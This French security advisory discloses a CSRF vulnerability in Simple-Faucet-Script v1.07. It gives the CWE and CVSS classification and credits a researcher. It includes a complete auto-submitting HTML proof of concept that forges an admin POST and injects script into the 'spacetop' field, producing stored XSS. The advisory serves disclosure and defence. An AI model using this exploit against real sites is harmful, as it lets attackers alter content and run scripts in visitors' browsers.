
Une vulnérabilité de type Cross-Site Request Forgery (CSRF) dans Salmen2/Simple-Faucet-Script v1.07 via une requête POST conçue vers admin.php?p=ads&c=1, permettant aux attaquants d'exécuter du code arbitraire.
Une vulnérabilité de type Cross-Site Request Forgery (CSRF) dans Salmen2/Simple-Faucet-Script v1.07 via une requête POST forgée vers admin.php?p=ads&c=1 permettant à des attaquants d'exécuter du code arbitraire.
CWE-352:Falsification de requête intersite (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Le produit est vulnérable à la falsification de requête intersite (CSRF) sur le panneau d'administration. Lorsqu'un administrateur authentifié visite une page malveillante contenant le PoC, l'attaque CSRF provoque une modification non autorisée du contenu de la page d'accueil.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Un attaquant peut injecter du HTML/JavaScript arbitraire dans la page d'accueil via le paramètre spacetop, conduisant à un Cross-Site Scripting stocké (XSS).
Muntadhar M. Ahmed (almuntadhar0x01)